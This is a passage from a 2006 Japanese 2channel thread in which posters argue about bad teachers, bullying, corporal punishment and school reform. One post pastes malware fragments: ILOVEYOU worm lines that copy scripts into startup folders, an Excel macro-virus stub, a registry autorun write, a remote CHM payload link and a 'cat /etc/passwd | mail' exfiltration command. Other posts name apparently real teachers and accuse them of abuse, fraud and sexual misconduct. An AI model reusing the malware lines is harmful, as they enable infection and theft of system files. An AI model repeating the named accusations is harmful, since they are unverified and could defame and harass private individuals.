教育上の問題で自殺者が出れば当然、業務上過失致死傷罪が適応されるべき。

108 :実習生さん:2006/10/22(日) 18:05:01 ID:qxs6AXiY
生徒、保護者全員に指名制、拒否制があればいい

人気がない教師は即クビ。

109 :実習生さん:2006/10/22(日) 19:20:59 ID:W03WE3Yf
>>108
何をもって人気と?
こんな人にかぎって気に入られようとしてませんか?
悪いと言われる教師がいて、良いと言われる教師がいる。
いろいろな役回りってあるんですよ。組織の中には・・・。
あなたがどんなに素晴らしい教師であっても、一人では何もできないでしょ。
いろいろな教師がいて学校は成り立っているのです。それが、現実です。


110 :実習生さん:2006/10/22(日) 19:26:52 ID:pZiK8Tt3
|            ド'^゙{      {        i  | | |
  |            |   ヽ  {  ヽ. \     |  |.||  
  |      .   |    \ ヽ.\ \.\ _,. -‐|l‐i|.| .|  
  |      ;   |      \ \ヽ 卜くヽ>='、.ハノ |  
  |      i   |  _,,. -―\ ヽ\| ,.イ:::::_;| /「i| ̄ |  
  |      l |  _,. |'"´_,,.:=ilf'ミ \|   .|'しリ ,. | |   |
  |      | |    |,.イ:::::::::;:}!       ヾ='ー' l. |   |   
  |     /`''|   ‐个:{'^し'と           ヽヽ ,ハ|   |
  |      | '^|   | .ゞ='      `     ,.′|  |    狂死って、サイテーだね。
  |   | |ヽ、|   |  ヽヽヽ   ー '′ /   |   |
  |   | | | `|    {`ト 、._          /}|    |    |    
  |    ! | ! ハ    V   ` −- .rくノ__八     |   |
  |.   ! | .,' } |   |_          h ヽY O}   ├‐、 |    
  |   i. |/ / ハ.    | \      リ ⊥L. \   ヽ ヽ|
  |  ,' / /_rくヽ}    |   ` ー-、_ }_/ ,| \ \   |   ヽ
  | ./ ./_∠イ\.〉 |   |      / iY/ ./_/^Y^ト、}  |.   ヽ
  / j-'ニ- '´ ○ ヽ |   |    / / / ./ノ ,人 \`¬-、   〉


111 :実習生さん:2006/10/22(日) 19:28:12 ID:TR+t5bYp
>>109
おいおい、何を尼チャンなこと言ってるやがる。

おまいが成績をつける生徒だっていろいろなヤツがいるだろうが。
おまいの言い方を借りれば「いろいろな役回りってあるんですよ。」
ってか。

だが、おまえはそういう役回りを考慮せず、できないやつには1や2をつけるだろ?
どうしてだ?

おまいのつけた1のために生徒は高校に進学できなくなるかもしれないじゃないか。
なのに、おまいはつけるだろ?

だったら、おまいも保護者や生徒や教委に評価されて当然なんだよ。
それにだ、生徒は金をもらってないのに、おまいらに評価されているだろ。
金をもらってるおまいら教師が評価されなくてどうする!

人気のないやつはクビ!
授業のヘタなやつはクビ!
それでいいのだ。

112 :実習生さん:2006/10/22(日) 19:31:05 ID:vMYGVJ9h
>>111
いや、1や2って普通につけられる方が悪いだろ。

よっぽどバカじゃないとつかないのに。

113 :実習生さん:2006/10/22(日) 19:48:07 ID:X0L++Ojc
どうしようもない教務主任を知っているから、教師を悪く言う人間が
いることも分かるけど、それで、教師全体を悪く言うのが分からない。
気の毒だと思うけど、小学校中学校高校とどうしようもない教師ばかり
に教わってきたの? それって、すごく惨めなことだと思うけど。


114 :実習生さん:2006/10/22(日) 19:50:20 ID:+AI+rukY
君は運がよかったんだよ。誰もいやな教師選んでないって。

115 :実習生さん:2006/10/22(日) 19:52:51 ID:vMYGVJ9h
>>114
まぁ今思えば教員は頭良くないとは思うけど、
それでも人間的に最悪なヤツはそこまでいなかったと思うぞ。

116 :実習生さん:2006/10/22(日) 20:06:47 ID:X0L++Ojc
一部にうちの学校の教務主任のように人間的に最悪な人間のいることは
事実だろう。でも、それは一部だよ。

117 :実習生さん:2006/10/22(日) 20:28:07 ID:fIUktQj8
いじめを隠してる今の日本の教師共は人間的に最悪に値するよ。

118 :実習生さん:2006/10/22(日) 21:39:21 ID:W03WE3Yf
>>111
わけわからん


119 :実習生さん:2006/10/23(月) 16:59:44 ID:wVVAe3B6
>>111
わけわからん

120 :実習生さん:2006/10/26(木) 20:45:47 ID:yLO1rVjm
>>117 3ナンバーの車は捕まえないお巡りがいたけど。これって、
常識だったよな。

121 :実習生さん:2006/10/27(金) 03:34:27 ID:7Gf7LvZu
ヒステリックで感情の赴くままに失言しまくりのオバティーでも学年主任が務まるんだ、年だからという理由で。カスが主任じゃ学校も潰れるだろうよ(笑)

122 :実習生さん:2006/10/27(金) 19:29:22 ID:GOJbRNzx
おかしな教師のいることは確かだけど、たとえば、君の場合、中三として、
9年間もまともな教師に担任してもらったことがないの? なんだか、すご
く気の毒。
 10年以上も馬鹿校長に苦しめられた俺の言うことじゃないだろうけど。

123 :実習生さん:2006/10/30(月) 15:25:49 ID:ihTbBEHm
履修問題 原因は教師。 全員首だ!!!
http://school5.2ch.net/test/read.cgi/edu/1162188786/


124 :実習生さん:2006/10/30(月) 15:57:42 ID:f7ntS7jB
自分はずっと公立学校で、いじめバカ教師ばかりいた。
あいつらのために税金払って、年金のために働くなんて、
人生イヤになっちゃうよ。あいつらに年金あげなければ、
少子化でもやっていかれるよ。第一、自分は、あいつらのせいで
子供を産むのをやめたんだから。

125 :実習生さん:2006/10/30(月) 19:47:37 ID:ioNyqsCq
>>123 教師じゃないよ。校長が原因。
>>124 俺も変なのに当たったことがあるし、今でも変なのを見ているけど、
あんたは本当に気の毒だねえ。そういう変なのしか見ていないのか、、、、

126 :実習生さん:2006/10/30(月) 20:05:57 ID:lErzeC36
教師には精神病院に数ヶ月も入院するような廃人でも
ぬけぬけと教育現場に復帰する。民間の会社なら
リストラものだよ。おまけに公僕のくせに生意気。
教師は生徒殴ってもあまり問題にならないのに
生徒が教師殴ると少年院送り。セクハラばかりするしね。
日本を滅ぼすのは教師だよ。教師全員非国民。
教師が生徒を呼ぶとき「〜さん」てさんづけで
生徒が教師を呼ぶときは呼び捨てで充分。

127 :実習生さん:2006/10/30(月) 21:45:39 ID:kl+/eP1H
バブラーの世代で人生の保険に教員免許取るのはやったから民間落ちまくりのどうしようもないのが
教師になったりしてるんだろうな。連中の頃って大学出てたら上場企業の内定なんて楽勝で取れたは
ずなんだけど。

128 :実習生さん:2006/10/30(月) 22:04:02 ID:3NI+elqF
とにかく、一刻も早くバウチャー制を導入しないと、この国は確実に滅ぶよ。
日教組という毒素を日本国から早く出さないと、
生徒の学力は下がる一方、親の塾代負担は限界。

129 :実習生さん:2006/10/30(月) 22:09:02 ID:uax8ote4
カスと罵ってる相手にやられっぱなしの自分が
ダメ人間だとわかってない時点で、くずだね
生きると言うことは遊びじゃない
真剣に生きろよ

130 :実習生さん:2006/10/30(月) 22:21:07 ID:BMaJWu7N
うちの学校でとても問題の教師がいるんですけど、どうすればやめさせれますか?

131 :実習生さん:2006/10/30(月) 22:22:07 ID:/5XTom/Q
>>129
分かってないなぁ。
権利が平等じゃないの。

132 :実習生さん:2006/10/30(月) 22:24:36 ID:KVjHvs7c
そんなもん、しょうがねえだろ。
大人になってもムカつく子供とかいるよw
いじめられてたらスカッとするよ。
みんなそうだよ、そんなん当たり前だろw

133 :実習生さん:2006/10/30(月) 22:26:03 ID:PzlItiEV
>>130
様々な機関に、ちくれ!
ネット社会の最大価値を利用しろ。

134 :実習生さん:2006/10/31(火) 12:58:40 ID:XSq6EQZ9
俺たちの税金が基地外教師の給料になってる点が許せない。
あいつらロリコンで女子生徒みてハァハァいってるんだから
給料を貰うんじゃなく金を払うべきだよ。

135 :実習生さん:2006/10/31(火) 14:56:41 ID:X5T8+KlI
土岐先生を自殺に追い込んだ校長の中学校名は?
確か千葉市若葉区だった

136 :実習生さん:2006/10/31(火) 19:52:29 ID:Kw059Rtr
>>128 どさくさに紛れて、現政権保守のための投稿をしないように。
もっとも今の組合員なんて、ヒラメばかりだけど。
 確かに、うちの教務主任とかある学校にいた教務主任なんて滓の滓
だけどそんなの一部だよ。俺なんて、今の学校で初めて、こんな無能
で人格的に醜い人間が本当にいるのかと初めて知ったんだから。



137 :実習生さん:2006/10/31(火) 20:17:05 ID:8ROqKMYd
金八先生
熱中先生
教師ビンビン物語の先生
みにくいアヒルの子の先生
伝説の教師
GTO
ヤンキー先生
ヤンクミ
夜回り先生
みたいな先生も中にはいるよ。0.01%くらいの割合だけどね。

138 :実習生さん:2006/10/31(火) 20:24:38 ID:Buzw0VQH
ばかばっかだな

139 :実習生さん:2006/10/31(火) 20:32:41 ID:NYOZYsrZ
>>126
>教師は生徒殴ってもあまり問題にならないのに
>生徒が教師殴ると少年院送り。

逆だろ?w


140 :実習生さん:2006/11/01(水) 00:28:00 ID:fUi74fY7
教師のことを今でも偉いなんて思ってる奴いるの?
ただ大学出てるだけで社会を知らない馬鹿ばっかじゃん。
それに仕事楽なくせに給料取りすぎ。生徒と結婚するなんて言語道断。
女子学生が世間を知らないことをいいことに触手を伸ばす。
社会で一番卑しい職業・・・それが教師だよ。

141 :実習生さん:2006/11/01(水) 00:30:53 ID:GezuXh5u
だからよ、そんなカスばかりいる学校なんて、つまんねーだろ?
行くなよ。
誰も、お前に来てほしいなんて、思ってないんだからさ。

142 :実習生さん:2006/11/01(水) 00:31:31 ID:xOv8jmiT
>給料取りすぎ。
これ良く見るけど
教師の給料で取り杉って
どんだけブラックだよw

143 :実習生さん:2006/11/01(水) 00:32:12 ID:o17NDa9N
教師の給料でとりすぎってなら、よっぽどオマイら学生時代サボったんだな。

144 :実習生さん:2006/11/01(水) 00:33:52 ID:zYNVAJCf
1はよっぽどいじめられたんだな。
かわいそうに、いまでもそうなんだろ!

145 :実習生さん:2006/11/01(水) 00:57:01 ID:b0tJqeGQ
>>144
そんな、最低な教師が多いって事だろう。

146 :実習生さん:2006/11/01(水) 00:59:38 ID:zYNVAJCf
ありがとう、最低の教師でも
給料は年功序列。
ざまぁみろ。
なれるもんなら、なってみろ。
「そんなのなりたくない」とかいう種の
犬の遠吠えするなよな。



ほなさいなら。

147 :実習生さん:2006/11/01(水) 01:05:52 ID:b0tJqeGQ
>>146
無能教師は、事故がおきれば業務上過失の罪を問われる時代が来る。
君みたいなモラルの無い者でも背伸びして、教師になれたのだろうが、
これからは、せいぜい罪人にならないように気をつけな!

148 :実習生さん:2006/11/01(水) 01:15:29 ID:ebfyvWdM
つーか体罰って傷害罪にならねえの?
成人が未成年に暴行働いてんじゃん

149 :実習生さん:2006/11/01(水) 01:21:03 ID:BB6FkQNp
1は人権侵害でタイーホされないのか

150 :実習生さん:2006/11/01(水) 01:27:25 ID:MMtAFT0q
まあ、芸術系とか「夢破れてサンガリア」って感じだからなw

151 :実習生さん:2006/11/01(水) 02:45:47 ID:kxiiB5pv
じゃあ調子に乗って教師を殴るバカ生徒も傷害罪だな。

152 :実習生さん:2006/11/01(水) 04:11:56 ID:IMAqzivG
まぁ教師が最低なんていうのはそいつ自体に問題がある場合が多いな
自分がバカなのを教師のせいにして開き直ってるとしか思えない。
やる気ないなら学校くんなよ。目障り

153 :実習生さん:2006/11/01(水) 07:51:51 ID:CMAPbRay
最近は、ろくでもない親が教師にイチャモンをつけるケースも多いらしい。


154 :実習生さん:2006/11/01(水) 11:23:50 ID:jYteFpBy
教師ってか社会全体にカスが多いだけじゃね?
って言ってみる。

155 :実習生さん:2006/11/01(水) 11:37:53 ID:ebY1I7Zu
オイラの祖父母は教師で、伯母も元教師だった。
祖父は外面は良かったみたいだが、家では女房子供を
殴る蹴るのDVおやじだった。祖母は金持ちの子供と
貧乏なうちの子供をあからさまに差別し、有力者の
子供を可愛がって権力に取り入り、勲五等瑞宝章を
もらった。もう、そんな昔からヘンなんだよ。


156 :ryo:2006/11/01(水) 12:06:16 ID:mYL/XHyV
でもまぁいい人もいるっちゃあいるぞ。
俺ん家離婚するとかなんとかでさ、
部活の先生が(小学校)親代わりみたいに可愛がってくれた。
ちなみに俺は金持ちじゃない。
体弱くてよく熱出すたんびに家まで送ってくれて
看病してくれたり、元気なかったら抱きしめてくれたり。

157 :実習生さん:2006/11/01(水) 12:09:38 ID:fUi74fY7
しかしなぁ教師がカス人間だからって理由で学校辞めて
就職して税金納めたら、その税金がカス教師の給料の
一部になるんだよね。それと田舎の学校では教師の
生徒に対する暴力は日常化してるよ。

158 :実習生さん:2006/11/01(水) 14:01:22 ID:nf0bZawE
>>157
俺相当田舎の学校出身だけど、別に教師に暴力ふられたことねーぞ。

159 :実習生さん:2006/11/01(水) 20:24:36 ID:z7jNX+MM
一部に悪い教師がいることは認めるけど(うちもそうだし、、、
教務主任とか、、、、)だからといって、全てがそうだと思うのは、
おかしいよ。田舎だから教師はだめだというのもおかしい。一部の田
舎、田舎の学校の一部の教師にはそういうのいるだろうけど。

160 :実習生さん:2006/11/01(水) 20:31:29 ID:l7jsPqs6
教師の身分保障を撤廃。これしかない

161 :実習生さん:2006/11/01(水) 20:41:44 ID:uWejpeoG
>>160
教師の身分保障が撤廃されてもオマエみたいなこのスレの連中のドタマが良くなるわけではない!


162 :実習生さん:2006/11/01(水) 20:53:50 ID:iqG++KE3
>>161
確かに。

が、しかし、世間のストレスは緩和される。


163 :いおう:2006/11/01(水) 21:05:39 ID:TRpGcktj
こんなことして楽しい?

164 :実習生さん:2006/11/01(水) 21:06:01 ID:ZKLY88Pk
今、教師は世間からスケープゴートにされているだけ。
止まない雨などない。

165 :実習生さん:2006/11/01(水) 22:29:28 ID:CYEmmVU2
先月、副担任が授業中にウ○コ漏らしました・・・


166 :実習生さん:2006/11/02(木) 05:34:04 ID:KTIzDoXQ
>>164
しかし、やんだあとは、教育基本法改正、バウチャー制成立後だから日教組は壊滅しているよ。

167 :実習生さん:2006/11/02(木) 20:31:54 ID:Y3KYd2yj
攻撃されるような欠点があるのが悪い。

168 :実習生さん:2006/11/02(木) 21:19:08 ID:IbpWMdpj
カス採用すんな

169 :実習生さん:2006/11/02(木) 21:32:47 ID:eLn9SXSk
こんな教師がいるがどうなんだよ。
こいつ教員のクセに既に2年くらい仕事してねーぞ。
しかも、バイクツーリング三昧ときている。鬱病なら家でじっとしとれ。
なにバイク乗り回しとるんじゃい。
ドアフォ。
http://www.geocities.jp/jvmxjp/index.html


170 :実習生さん:2006/11/02(木) 21:37:49 ID:s8khAXZC
期待しすぎる保護者も問題。

171 :実習生さん:2006/11/02(木) 23:45:23 ID:+c7hIJds
>>166
ところが来年の参議院選挙で民主党が自民党に勝利すると
形勢は変わるよ。

172 :実習生さん:2006/11/03(金) 00:38:19 ID:Vh1Vz+Cu
アレだよな。教師になってはいけない人、多々いるよな。
良い先生もたくさん居るがね。
体罰も多少すべきだね。

173 :実習生さん:2006/11/03(金) 00:49:55 ID:Eq4NqrHd
体罰教師だけにすればいいのに・・・なんで今はこんなあまあまちゃん
なんだろ

174 :実習生さん:2006/11/03(金) 01:10:17 ID:Z8z0AKfe
生徒に教師がいじめられ自殺
教師が生徒をいじめられ自殺
マスコミや世間はどうして後者ばかり責め立てるの?せ

175 :実習生さん:2006/11/05(日) 00:13:50 ID:53ivc5Fq
_?

176 :実習生さん:2006/11/05(日) 01:38:33 ID:XfFWbWBm
聖○院、赤熊やめろ、学校の質落とし。

学校も最低だな。病人ばかり

177 :実習生さん:2006/11/05(日) 01:56:58 ID:KKzMa8Zw
学校の通常業務、、つまり、授業を妨害する生徒は、公務執行妨害
いいかげんに、まじめにがんばってる生徒の邪魔をするなよ
邪魔して、まじめな子の成績を下げたいのか?

178 :熊さん:2006/11/05(日) 06:48:44 ID:zsnczQIS
教員は批判されやすいですね。
えらそーにここで批判している人たち、
1年間でいいから、教員をやってみてください。
そして、批判をしてください。
特に中学の教員を・・・・・。

179 :実習生さん:2006/11/05(日) 07:50:03 ID:NMCU6SNt
清掃係は批判されやすいですね。
えらそーにここで批判している人たち、
1年間でいいから、清掃係をやってみてください。
そして、批判をしてください。
特に奈良の清掃係を・・・・・。


180 :実習生さん:2006/11/05(日) 12:27:11 ID:K8jPIJEu
>>178

会社で一度でも働いてからほざけw
お前のレスがいかに教師がぼんぼんかのあらわれだww

181 :実習生さん:2006/11/05(日) 12:31:15 ID:7bnMZfrf
関東北部の県出身で、今、千葉県の松戸市の小学校で働いているという笠原。
正規採用ではないらしいけど、知った時はびっくりしました。
昔、とてもひどいいじめにあいました…他の人もいじめられていました。
内容はこのようなとこには書けません。
どうか一生教師にならないでほしい。子どもが本当にかわいそう。
あの人のせいで、何もかも自信なくなって人生狂った…
「執念深い」とか「そんな昔のことを」と思われるかも知れませんが、
私をそんな性格にしてしまったのも一部はあの人のせいです。
いじめられた経験のない人には絶対にわからないと思います。
千葉県の教育委員会にメールしたいぐらいです。
福岡のいじめた中学生とかも、年数がたてば普通の社会人になるんでしょうね…
本当に悔しい。

でもこの2ちゃんねるに書き込んで、それで最後にして忘れることにします。
あの人の存在を自分の記憶から消したいからです。
自分がこれから不幸な人生を送らないよう、忘れることにします…

182 :実習生さん:2006/11/05(日) 21:53:05 ID:OvuGGhQl
夜の校舎窓ガラス壊してまわった♪

183 :実習生さん:2006/11/06(月) 21:34:14 ID:f2JduJOP
確かに滓の教師はいるよ。うちの教務みたいに。でも、全部じゃない。
変なのにばかり当たって気の毒だとは思うが。


184 :実習生さん:2006/11/06(月) 23:16:38 ID:YdQSElfG
教員ってある程度以上の人間が多いと思うけど。
ある程度だけど。

だから、「バッシングされるの覚悟で、子どもが好きだからヘンな希望持っちゃったお人よしイコール教員だと思う。
異論のあるヤツ前へ。

185 :実習生さん:2006/11/06(月) 23:39:13 ID:YdQSElfG
異論ありましぇーん!!激しく同意!!!教師と一般(ある程度知名度のある
会社)と経験した漏れがハッキリいいます。教師はサンドバックです、そして
それにいろんを唱える覇気のあるヤツのいないのが教員です。いいひとぞろい
で、一般の酸いも甘いも噛み分けたヤツに文句いわないんだよな。そんな苦労
をした児童生徒をいやというほど見ているからかもしれない。

186 :実習生さん:2006/11/07(火) 20:34:57 ID:5gFc2OEg
必死に残って絵を描いているのに、「のろいやつはのろい上に下手だ。
下手な者にはいくら時間をかけてもむだだ。」と平気で言った俺の
学校の教務主任。前から人間性に問題を感じていたけど、これほどひ
どいとは思わなかったなあ。

らね、おかしいとは思っていたけど。



187 :実習生さん:2006/11/07(火) 22:43:27 ID:wjV0J4bn
>>1

もまいが滓じゃ

188 :実習生さん:2006/11/08(水) 12:17:58 ID:WwoBIF5v
とある大学で教授してるやつがいるけど、教授という立場を利用して、好き勝ってにやってる教授は許せない。しかもその中でも、永橋ヒロヨシとかいやつが最も許せん(怒)

189 :実習生さん:2006/11/08(水) 20:02:33 ID:a8vgHMcC
生徒手帳を持って行ってたハゲには一度「お礼」しておきたい

190 :実習生さん:2006/11/08(水) 20:07:12 ID:odyoNQX3
よくわかるなあ。いやな狂死は首にしたいよな。東邦のおさないとか。

191 :実習生さん:2006/11/10(金) 07:05:20 ID:LCcGS4Fk
おう

192 :実習生さん:2006/11/10(金) 12:22:22 ID:4yiC6yEG
ttp://brown.gazo-ch.net/orz/read.php/thread/22/1061394/

こいつは女とのえっち写真をネット流出したバカップル教師!
福○県い○き市磐○高校教○!去年まで生○会担当。

193 :実習生さん:2006/11/10(金) 23:18:55 ID:zuzUKiQc
名前かくのは卑怯じゃない?やり方として。
論理かんけーなく。
いろんな感じ方あるんだし。

194 :実習生さん:2006/11/13(月) 10:13:11 ID:lOq9fK0J
http://ajdis.power.ne.jp/honne/

195 :実習生さん:2006/11/16(木) 09:34:13 ID:OfHwzWE+


196 :実習生さん:2006/11/16(木) 09:50:47 ID:uBI8XX+V
(゚Д゚)ハァ?
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

197 :実習生さん:2006/11/16(木) 11:20:40 ID:lV+DOUl2
普通出世するには「仕事の出来と周囲との信頼関係」の二つが重視される。

教師の場合、生徒がいうことをきかなけば生徒が悪いと非難する
(俺は教師に性根が悪いと言われた)一生忘れない

お山の大将。


198 :実習生さん:2006/11/16(木) 11:25:24 ID:0mZ0mtVr

【社会】中学教諭、河川敷で下半身露出 公然わいせつ容疑で逮捕…広島県警

★河川敷で露出、中学教諭逮捕=広島

 河川敷で下半身を露出していたとして、広島県警広島中央署は11日、
公然わいせつ容疑で同県東広島市立磯松中学校教諭寺田芳彦容疑者
(49)を逮捕した。同容疑者は容疑を認めている。

 調べによると、寺田容疑者は11日午前11時20分ごろ、広島市中区の
本川河川敷の遊歩道上で、女性(56)に向け下半身を露出した疑い。

http://headlines.yahoo.co.jp/hl?a=20061111-00000090-jij-soci


199 :実習生さん:2006/11/16(木) 13:57:45 ID:VMxaWhel
東京都の石原慎太郎知事が海外出張の際、都条例の規定を大幅に超過する高級ホテルやク
ルーザーに宿泊し、衆院議員時代からの秘書も、飛行機は知事と同じファーストクラスに格上げし
ていたことが15日、共産党都議団の調査で分かった。石原都知事の規定額は総理大臣と同額だ
が、それを超えていた。神奈川、埼玉、千葉の各知事はそれより下のランクで、いずれも「規定額
を超えたことはない」という。

 石原都知事はこれまでに計19回の海外出張をしており、共産党の調査では、記録が残ってい
る過去5年の15回分で、同行職員分も合わせて出張費の総額は約2億4350万円に及んだ。同
党はこのうち6回について、情報公開請求で詳細な記録を入手し、公表した。

 都知事の宿泊費や交通費、日当は48年制定の都条例で定められている。「国家公務員等の旅
費に関する法律」に準じており、総理や最高裁長官と同額だ。例えばロンドンやワシントンなど大
都市では1泊4万200円。だが、詳細な記録のある6回の出張では、石原知事の宿泊費は規定
の3.3〜1.6倍だった。
(中略)
 石原知事はこの日、「何も豪勢な旅行をしようと行っているのではなくて仕事だから。(出張費の
使い方は)知事が差配することではない。規定はよく知らないし、それからはずれているなら直さ
なければいけないと思う」などと語った。
http://www.asahi.com/national/update/1115/TKY200611150466.html


200 :実習生さん:2006/11/20(月) 13:43:27 ID:nVHid3Pc
200

201 :実習生さん:2006/11/20(月) 15:10:02 ID:OJ6VTcmG
教育委員会って馬鹿か?

16 :実習生さん :2006/11/13(月) 13:42:00 ID:h1rNu1XK
ビックリした。
俺は去年初任研を終えたんだが、学生時代までのスポーツ実績を買われて例外的に今年障害者交流センターのスポーツ指導員として県に出向しているんだけど、
昨晩いきなり県教委から電話かかってきて、「●●養護学校で欠員が出たからとりあえず3月まで行ってくれないか?」って。
おいおい。
「これまでのスポーツの実績が素晴らしいから障害者交流センターのスポーツ指導員をやってくれないか。今年からの取り組みだから、いろいろ試行錯誤している。協力してくれ」
って頼んできたの県教委じゃん。
いきなり「欠員出たから学校行ってくれ」って何だよって話。
「利用されている方のことを考えたら、今のタイミングでは異動できません」と丁重にお断りしておいた。

202 :実習生さん:2006/12/01(金) 03:51:32 ID:lKc1G7NN
m


203 :実習生さん:2006/12/11(月) 17:25:04 ID:4BnmiwpC


204 :実習生さん:2006/12/11(月) 17:33:31 ID:uv7lKAeH
>教師って人間のカスばっか

同意。

205 :実習生さん:2006/12/11(月) 23:34:17 ID:zMtf+2jR
カスはひどい。チンカスだろ。

206 :実習生さん:2006/12/12(火) 14:59:35 ID:vCQ4ikPL
チンカスが可哀相

207 :実習生さん:2006/12/12(火) 23:41:15 ID:KdvvcX7p
おいそこのバカ英語教師。
採点ミスばかりやらかしてないで、まともな授業してくれ。
許してくれなくていい、頼むから教師らしくしてくれ。
できないなら自習させてくれ。


208 :実習生さん:2006/12/13(水) 13:21:29 ID:ceOOmZX7
<信頼されない人>
教師
医師
政治家
警察官
官僚

209 :実習生さん:2006/12/15(金) 22:11:26 ID:wQzr9xaz
教育界の問題点は矢っ張り上の者のレベルの低さだろうな。

210 :実習生さん:2006/12/15(金) 22:24:01 ID:MWhl0Kye
おまけに閉鎖的で自浄能力ゼロと来たもんだ。
凶悪だな。

211 :実習生さん:2006/12/19(火) 19:57:05 ID:Txy55Klv
汚しまくっているのが上の者だけどな。もう、平には手のつけようがない。

212 :実習生さん:2006/12/23(土) 19:23:08 ID:cRjHcqRD
教師を悪く言う人間がいるのは分かるけど、その背景にあるものを
少しは考えて欲しいな。

213 :実習生さん:2006/12/23(土) 19:25:57 ID:soBk28y6
今だに体罰を平気で行う凶死がいる事に感動した

214 :実習生さん:2006/12/23(土) 22:20:26 ID:8RXX7Bv4
>>212
教師が荒む背景を考慮に入れろ?

…どこまでも迷惑な奴らだ。

215 :実習生さん:2006/12/24(日) 01:13:26 ID:Aa+jP0Bg
>>214
教師に全ての責任を押し付けておけば自分は楽だもんねw

俺は教師に責任が一切無いとは言っていないよ、念のため

216 :実習生さん:2006/12/24(日) 01:30:07 ID:FZUm61HU
その中の教師の問題点を語るスレじゃないの?

217 :実習生さん:2006/12/24(日) 01:52:14 ID:Aa+jP0Bg
「教師の問題点」を語ろう
「問題のある教師」じゃなくてさ

218 :実習生さん:2006/12/24(日) 01:57:39 ID:AKcgAyk5
>>217
そういう観点は、重要だな。

219 :実習生さん:2006/12/24(日) 02:06:35 ID:FZUm61HU
恐らくは学生さんの私怨書き込みも不毛な物を感じるけど、
まあ、それも必要っちゃあ必要かなと思うな。

220 :実習生さん:2006/12/24(日) 02:12:47 ID:Aa+jP0Bg
>>219
必要ではあるだろうから、書き方を変えたらどうだろう
「こういう問題教師がいます」ではなくて
「こういう問題教師が存在できるのが問題なので、〜したらいいんじゃないか」とかね

221 :実習生さん:2006/12/24(日) 02:24:17 ID:FZUm61HU
>>220
まあ、そうなんだけどさ、中高生には難しかろうよ

222 :実習生さん:2006/12/24(日) 02:38:53 ID:Aa+jP0Bg
>>221
親と教師以外の大人を見る機会が無いからねぇ・・・
高校生なら「教師の選択制度」くらいは思いついてほしいが

223 :実習生さん:2006/12/24(日) 10:46:52 ID:2Ev3GzuZ
日本人のくせに
大学時代、京都で、在日の不幸な母子家庭の娘を騙り
人の善意につけ込み
父親が借金をして他界したとか嘘をつくり
小泊の母親の治療費だの弟の学費だのと大金をせびり
豊中の他人のおっさん名義の携帯を使って、うまく逃げたつもりの高校英語女教師29
あくどい過去を隠して、同僚男の家庭事情に同情したように見せかけて結婚
京都の実家を出て近県の海沿いの僻地に勤務した理由は
過去を隠して男を見つけるためだったんねぇ
養子になった旦那は何も知らずに、子育てのために仕事を辞めてくれ
とか懇願してる始末
同じようなこと他の人にもしたんだってなぁ
おまけに、中絶、円光もしてたって?
ついでにおまえの2才のガキのにやけた笑いは将来の詐欺師決定だな
人の道に外れたことはしてはいけないとか説教して
反省の色も無し
のうのうと育休とって、学校近くの坂道の上の職員住宅住み
人をどこまで欺くんでしょうかね

224 :実習生さん:2006/12/24(日) 14:31:37 ID:UiH4F3GK
そういえば中学生の頃、「堀繁利」という人として終わっている体育教師に、
よく体罰を受けていたな。

まだ、人を殴ってんのかね、堀は。
さすがに、今やってたら問題になるよな。
時代が良かったんだねえ、堀くん!

ググったら、いまは練馬区立旭丘中学にいるらしいが。

225 :実習生さん:2006/12/26(火) 17:58:19 ID:2i6UJ/7p
まあ、たしかに、すごいのがいるからね。運悪くそんなのがそろっている
学校に進級したら、小学校なら6年、中学校でも3年、カスばっかに苦し
められるのか、、、、
 運が良ければその反対もあるから、それを願うんだね。

226 :実習生さん:2006/12/26(火) 22:07:10 ID:11XxbtMb
やはり、こういう問題は、それらカスとリアルタイムに対峙する子ども自身が
カスをやり込める知性と品格と行動力を持たなきゃ駄目だよね。


227 :実習生さん:2006/12/27(水) 01:14:13 ID:3SVbSArh
体罰じゃないが
俺を嫌って教師が受験の前日に「お前なんか落ちろ」
って何回も言ってきやがった
そんで落ちた
それから俺に勝ち誇った態度で絡んできやがる
正直、学校行きたくなくなる

228 :実習生さん:2006/12/27(水) 01:23:14 ID:fnIvoDat
224、大丈夫?来春から、名誉毀損とかで訴える場合ネットの発信者公開
できるって、ヤフーニュースで書いてあったじゃん。

229 :実習生さん:2006/12/27(水) 01:33:40 ID:ufrrXxmo
>>227
録音した?

230 :実習生さん:2006/12/27(水) 01:39:24 ID:3SVbSArh
>>229
してない
これって問題だよな?

231 :実習生さん:2006/12/27(水) 01:41:04 ID:28JK0cqI
>>228
教師の仕事と付随行為は私学校の教師でも公務にあたり、公務中の出来事は実名公開されても問題なし。
事実無根だったら訴えられることもありえるけど。

232 :実習生さん:2006/12/27(水) 01:41:24 ID:ufrrXxmo
>>230
俺はこういうことのために、ボイスレコーダー付きの携帯に買い換えた
録音できなくても、話の内容と日時・場所をメモしておけば有力な手がかりになります
おかげで最近はやつらがおとなしいw

